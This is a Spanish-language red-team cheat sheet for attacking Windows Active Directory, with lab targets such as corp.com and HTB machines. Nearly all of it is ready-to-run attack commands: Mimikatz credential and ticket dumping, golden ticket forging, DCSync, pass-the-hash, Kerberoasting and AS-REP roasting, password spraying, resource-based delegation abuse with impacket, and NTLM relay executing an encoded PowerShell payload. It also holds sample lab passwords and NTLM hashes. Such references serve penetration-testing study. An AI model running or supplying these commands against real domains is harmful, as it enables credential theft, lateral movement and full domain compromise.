Las escaladas locales pueden ser utilies Escalada de privilegios Windows

Enumeracion del equipo en dominio

• Información del Dominio

  # Obtener información del dominio actual
  [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
  
  

• Obtener usuarios y grupos del dominio

  # Ver usuarios de dominio
  net user /domain
  
  # Ver información de un usuario específico
  net user jeffadmin /domain
  
  # Ver grupos de dominio
  net group /domain
  
  

• Utilización de PowerView

  # Importar PowerView para PowerShell
  Import-Module .\\\\PowerView.ps1
  
  # Obtener información del dominio
  Get-NetDomain
  
  # Listar usuarios del dominio
  Get-NetUser | select cn
  
  # Obtener detalles de usuarios y su último inicio de sesión
  Get-NetUser | select cn, pwdlastset, lastlogon
  
  # Listar grupos del dominio
  Get-NetGroup | select cn
  
  # Obtener miembros de un grupo específico
  Get-NetGroup "Sales Department" | select member
  
  # Obtener información de computadoras del dominio
  Get-NetComputer
  Get-NetComputer | select operatingsystem, dnshostname
  
  

Escalada de Privilegios y Persistencia

• Uso de Mimikatz

  # Ejecutar Mimikatz para obtener contraseñas y tickets
  .\\mimikatz.exe
  privilege::debug
  sekurlsa::logonpasswords
  sekurlsa::tickets
  
  # Generar un ticket dorado con Kerberos
  kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
  
  # Obtener hashes de contraseñas del dominio con DCSync
  lsadump::dcsync /user:corp\\\\dave
  lsadump::dcsync /user:corp\\\\Administrator
  
  # Pasar el hash con Mimikatz
  sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell
  
  # Obtener ACL de LSA
  lsadump::lsa /patch
  
  # Limpiar tickets Kerberos
  kerberos::purge
  
  # Exportar tickets con Mimikatz
  sekurlsa::tickets /export
  
  # Listar archivos .kirbi en el sistema
  dir *.kirbi
  
  # Importar un ticket con Kerberos
  kerberos::ptt [0;12bd0][email protected]
  
  # Ver tickets Kerberos
  klist
  
  

• BloodHound para Análisis de Caminos

  # Importar Sharphound para PowerShell
  Import-Module .\\Sharphound.ps1
  
  # Ejecutar BloodHound para recolectar datos (ejemplo)
  Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\\\\Users\\\\stephanie\\\\Desktop\\\\ -OutputPrefix "corp audit"
  
  # Desde linux
  bloodhound-python -u jim -p 'Castello1!' -d relia.com -ns 172.16.154.6 -c all
  
  

Ejecucion de comandos y persistencia

• Utilidades Impacket

  # Ejemplo con impacket: agregar un equipo al dominio
  impacket-addcomputer -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host freelancer.htb -domain-netbios freelancer.htb freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199'
  
  # Ejemplo con impacket: delegación de permisos
  impacket-rbcd -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'DC$' -dc-ip 10.129.108.63 -action 'write' 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199'
  
  # Obtener un ticket TGT con impacket
  faketime -f '+1h' impacket-getST -spn 'cifs/DC.freelancer.htb' -impersonate Administrator -dc-ip 10.129.108.63 'freelancer.htb/ATTACKERSYSTEM$:Summer2018!'
  
  # Obtener contraseñas con impacket
  faketime -f '+1h' impacket-secretsdump -no -k DC.freelancer.htb -just-dc-user administrator
  
  

• Utilidades y Técnicas Adicionales

  # Utilizar Kerbrute para ataques de fuerza bruta de contraseñas
  .\\\\kerbrute_windows_amd64.exe passwordspray -d corp.com .\\\\usernames.txt "Nexus123!"
  
  # Enumerar usuarios y grupos con CrackMapExec
  crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
  crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
  crackmapexec smb 10.10.10.10 --groups --loggedon-users
  
  # Utilizar CrackMapExec para auditoría SMB
  crackmapexec smb 192.168.50.75 -u dave -p 'Flowers1' -d corp.com
  
  # Utilizar CrackMapExec para auditoría WinRM
  crackmapexec winrm 192.168.50.75 -u dave -p 'Flowers1' -d corp.com
  
  # Continuar en éxito con CrackMapExec
  crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
  
  # Obtener tickets de usuario no privilegiado con impacket
  impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
  
  # Obtener hashes de Asreproast con Rubeus
  .\\\\Rubeus.exe asreproast /nowrap
  
  # Obtener hashes de Kerberoast con Rubeus
  .\\\\Rubeus.exe kerberoast /outfile:hashes.kerberoast
  
  # Obtener tickets de usuario SPN con impacket
  sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
  
  # Usar credenciales predeterminadas para acceso web util si tenemos un tiquet en klist
  iwr -UseDefaultCredentials <http://web04>
  
  # NTLM Relay
  impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."
  
  # Faketime para kerberos
   faketime "$(ntpdate -q frizz.htb | awk '{print $1" "$2}')" zsh
  

• DCOM

  $username = "domain\\username"
  $password = ConvertTo-SecureString "Password123!" -AsPlainText -Force
  $cred = New-Object System.Management.Automation.PSCredential($username, $password)
  $session = New-PSSession -ComputerName "remote_computer" -Credential $cred
  Invoke-Command -Session $session -ScriptBlock { Get-Process }
  Remove-PSSession $session
  

Referencias

https://powersploit.readthedocs.io/en/latest/Recon/

https://bloodhound.readthedocs.io/en/latest/

https://github.com/0xJs/RedTeaming_CheatSheet/blob/main/windows-ad/Domain-Privilege-Escalation.md

Escalada de privilegios Windows